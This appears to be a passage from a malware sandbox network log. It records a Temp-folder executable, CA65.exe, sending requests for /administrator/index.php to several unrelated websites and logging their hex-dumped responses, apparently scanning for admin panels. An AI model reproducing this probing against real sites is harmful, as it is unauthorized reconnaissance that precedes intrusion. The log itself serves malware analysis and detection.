2023-12-22 20:14:54 UTC	730	IN	Data Raw: 37 64 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7d23<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 68 64 2d 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 32 2d 31 30 2d 33 33 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 Data Ascii: dv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/responsive.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/hd-style.css?aa=2022-10-33"><meta name="t
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 2f 2a 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 29 3b 20 2a 2f 0d 0a 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 2c 20 7b 0d 0a 27 63 75 73 74 6f 6d 5f 6d 61 70 27 3a 20 7b 0d 0a 27 64 69 6d 65 6e 73 69 6f 6e 33 27 3a 20 27 73 69 74 65 Data Ascii: -7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());/* gtag('config', 'UA-7117339-4'); */gtag('config', 'UA-7117339-4', {'custom_map': {'dimension3': 'site
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 61 64 65 72 46 6f 72 6d 53 65 61 72 63 68 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 64 6f 6d 61 69 6e 5f 6e 61 6d 65 22 20 76 61 6c 75 65 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 69 6e 70 75 74 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 54 65 78 74 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 48 65 61 64 65 72 20 Data Ascii: erSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHeaderFormSearchID"><input type="text" name="domain_name" value class="search-input" id="hdv3HeaderSearchTextID" aria-label="Header
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 4d 65 6e 75 20 64 2d 66 6c 65 78 20 61 69 2d 63 65 6e 74 65 72 20 6a 63 2d 62 65 74 77 65 65 6e 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 6e 61 76 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 Data Ascii: nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="overlay "><div class="overlayMenu d-flex ai-center jc-between"><ul class="navbar-nav"><li class="nav-item"><a class="nav-link "
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 6e 75 6d 62 65 72 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 69 64 3d 22 68 64 76 33 43 61 72 74 4e 75 6d 62 65 72 53 70 61 6e 49 44 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 61 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 6d 61 Data Ascii: hopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.png" alt><span class="cart-number hiddenAtLoad" id="hdv3CartNumberSpanID"></span></a></div></div></div></div></nav></header><ma
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 38 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6f 72 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 Data Ascii: "circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7"></div><div class="circularJ_8"></div></div></button><span class="or">or</span><a href="https://www.HugeDoma
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 72 6f 6b 65 74 2d 73 69 64 65 2d 69 63 6f 2e 70 6e 67 22 20 61 6c Data Ascii: ttps://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/roket-side-ico.png" al
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 2c 30 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 36 2c 30 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 35 33 2e 39 36 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 68 20 66 6f 72 20 32 34 20 6d 6f 6e 74 68 73 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 6c 65 66 74 22 3e 0a Data Ascii: ,095</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$6,095</span> or pay <span class="green">$253.96</span> per month for 24 months</p><div class="tablet-block-row"><div class="tablet-block-left">
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 4b 65 79 77 6f 72 64 52 61 6e 6b 65 72 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 50 50 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 Data Ascii: tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=KeywordRanker.com" class="btn" style="padding-right:30px; width:247px; min-width:247px; margin-top:10px; " id="hdv3Billboard197BuyTabPPID" onClick="$('#hdv3Billboard197BuyT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	58944	69.42.204.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	231	OUT	GET /administrator/index.php HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://bldowney.com/administrator/
2023-12-22 20:14:54 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:54 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:14:54 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	58816	52.165.155.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	333	OUT	GET /administrator/index.php HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://intermountainmls.com/administrator/
2023-12-22 20:14:54 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:14:54 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:14:54 UTC	2174	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	59024	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	384	OUT	GET /administrator/index.php HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://loghole.com/administrator/
2023-12-22 20:14:54 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_f0XNWkmtw72uSjruOD+6oesREZ6ak3VIa8Zb4Gjeg+v/IrXHLya/aZAI0wtAIy5p4JuHiPyyxzAhK/+bnHmXZQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:54 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	59033	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	287	OUT	GET /administrator/index.php HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=2fl36mfrg7n47mi7p87aekl7e6 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://theproducebox.com/administrator/
2023-12-22 20:14:54 UTC	800	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Fri, 22 Dec 2023 21:14:54 GMT Cache-Control: max-age=3600 Cache-Control: s-maxage=10 X-Redirect-By: WordPress X-Frame-Options: SAMEORIGIN Location: https://theproducebox.com/administrator/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JbcDVydGPk869vljCZxa3BxFj%2FMcNJOSkOxliEk1d%2Ffe5eX4gHIZFQfaexzHO6tLVZdeJT7%2B7fKTNi0qRDKn1mIvX8hMK0fcWxe9stM%2FL5pQ2EbQbXD5pdkg%2BEEk4umsasW6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08a7df7867e1-MIA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	59034	141.193.213.10	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	808	OUT	GET /administrator/index.php HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip Cookie: apbct_site_landing_ts=1703276093; apbct_site_referer=UNKNOWN; apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522a93b46864202a543689f994154287e7f%2522%257D; apbct_page_hits=1; apbct_timestamp=1703276093; apbct_urls=%7B%22jaydien.com%2Fadministrator%2F%22%3A%5B1703276093%5D%7D; __cf_bm=0_u.f76yhO0ytQ.PcL9YYZi3Mfcha.NU5TjBdG5v2mY-1703276092-1-AVbRM/E3SNz9wtbySQ545wpVXp9HkixIJLpbROCOdMp5sAEb27sBqRYGyL2a4zW4/UDgeRv5vnSiDroaJ9MhFtY= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://jaydien.com/administrator/
2023-12-22 20:14:54 UTC	1349	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Set-Cookie: apbct_timestamp=1703276094; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_landing_ts=1703276094; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_prev_referer=https%3A%2F%2Fjaydien.com%2Fadministrator%2F; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_prev_referer%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%25224eccadc6cddfcaae3b8ee5645b0c61eb%2522%257D; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_urls=%7B%22jaydien.com%2Fadministrator%2Findex.php%22%3A%5B1703276094%5D%7D; expires=Mon, 25 Dec 2023 20:14:54 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_referer=https%3A%2F%2Fjaydien.com%2Fadministrator%2F; expires=Mon, 25 Dec 2023 20:14:54 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Expires: Fri, 01 Jan 71 00:00:00 +0000 Pragma: no-cache
2023-12-22 20:14:54 UTC	244	IN	Data Raw: 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 58 2d 43 61 63 68 65 61 62 6c 65 3a 20 4e 4f 3a 34 30 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 0d 0a 58 2d 43 61 63 68 65 2d 47 72 6f 75 70 3a 20 6e 6f 72 6d 61 6c 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 39 62 30 38 61 37 64 38 65 37 38 64 61 65 2d 4d 49 41 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: X-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Cache-Group: normalCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 839b08a7d8e78dae-MIAalt-svc: h3=":443"; ma=86400
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 31 66 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 72 69 76 61 74 65 22 3e Data Ascii: 1fa4<!DOCTYPE html><html lang='en'><head><meta charset='utf-8' /><meta name='viewport' content='width=device-width, initial-scale=1' /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="cache-control" content="private">
